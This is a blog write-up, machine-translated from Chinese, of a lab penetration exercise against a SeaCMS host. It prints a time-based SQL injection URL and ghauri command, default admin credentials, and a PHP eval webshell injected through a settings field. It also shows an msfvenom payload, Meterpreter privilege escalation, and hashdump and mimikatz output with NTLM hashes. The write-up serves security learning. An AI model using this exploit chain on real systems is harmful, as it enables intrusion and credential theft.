Virts

Virts

Virts's Blog ❤️
telegram
github
email
steam
douban
HomeArchives

CyberStrike Lab [PT-1] WriteUp

12
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The document describes a very easy penetration testing exercise in the CyberStrike Lab (PT-1). The process begins with information gathering, identifying the web application as SeaCMS, and discovering a time-based SQL injection vulnerability. Although the injection method using Ghauri is slow, it leads to the discovery of the admin panel by accessing the URL with the title "cslab." The default credentials (username and password both as "cslab") allow access to the backend. Once inside, the user finds a method to upload a web shell through a known vulnerability, enabling command execution. The user successfully gains a shell and retrieves a flag located in the root directory. For privilege escalation, the user follows a referenced method to gain system-level access using Metasploit. They generate a reverse shell payload, upload it, and establish a connection. After gaining system privileges, they use Mimikatz to extract credentials, successfully obtaining the NTLM hash of the Administrator account.

image

Flag1#

Information gathering revealed the website fingerprint as OceanCMS SeaCMS, and a vulnerability was scanned out with Wavely.

image
Checking the poc revealed the injection point as http://10.0.0.68/js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(4)))v)&type=list, which is a time-based blind injection that can be automatically executed with ghauri.

ghauri -u  'http://10.0.0.68/js/player/dmplayer/dmku/?ac=del&id=*&type=list' --dbs

image

However, it took too long; listing 5 table names took about 20 minutes. It could work for regular exploitation, but it shouldn't be the standard method for solving the challenge.

Directory scanning revealed PhpMyAdmin, but no known vulnerabilities were found, nor were there weak passwords or empty passwords. Although there were some directory traversal points, they didn't seem to offer any useful exploitation ideas, and no configuration information was leaked, so code review might be necessary.

However, the main backend directory was elusive. After searching for a long time, I discovered that the website's title was cslab. Initially, I assumed every lab had this title, but it turned out to be a hint. Directly accessing http://10.0.0.68/cslab led to the backend, and then the username cslab and password cslab were weak credentials that allowed access to the backend.

After that, I could look online for some known 1Day backend GetShell methods.

Referring to this article that mentioned backend GetShell, I set the Access Key: in Extensions -> Baidu Push to ";eval($_REQUEST[6]);// and submitted it, writing a WebShell. Accessing http://10.0.0.68/data/admin/ping.php?6=phpinfo(); revealed that command execution was possible.

Using AntSword to connect to http://10.0.0.68/data/admin/ping.php, I successfully got a shell, where flag.txt was located in the C:/ root directory.

Flag2#

I didn't understand privilege escalation very well, so I followed the method in this article to perform the operation, which successfully escalated privileges.

# msf generates a reverse shell payload
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe

I uploaded and ran shell.exe, then connected using MSF.

[email protected] workspace msfconsole                                                                                                                                                                                                                                                                                                                                         (base)

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 10.0.0.68
rhost => 10.0.0.68
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.0.68:4444
[*] Sending stage (203846 bytes) to 10.0.0.68
[*] Meterpreter session 1 opened (172.16.233.2:60932 -> 10.0.0.68:4444) at 2025-04-28 23:25:50 +0800

meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cad8ef0c410c9709cea512052756ce5a:::
ApacheUser:1000:aad3b435b51404eeaad3b435b51404ee:01ef84bcd8079831f0966ac49ae9c0e6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[!] Not running as SYSTEM, execution may fail
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain           NTLM                              SHA1
--------       ------           ----                              ----
Administrator  WIN-S4KAS0ERCGQ  cad8ef0c410c9709cea512052756ce5a  947e1029f3fc1ce2f1f6592a1e55844dd3152ea2

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-S4KAS0ERCGQ  (null)
WIN-S4KAS0ERCGQ$  WORKGROUP        (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     WIN-S4KAS0ERCGQ  (null)
win-s4kas0ercgq$  WORKGROUP        (null)

Successfully obtained the NTLM Hash cad8ef0c410c9709cea512052756ce5a.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.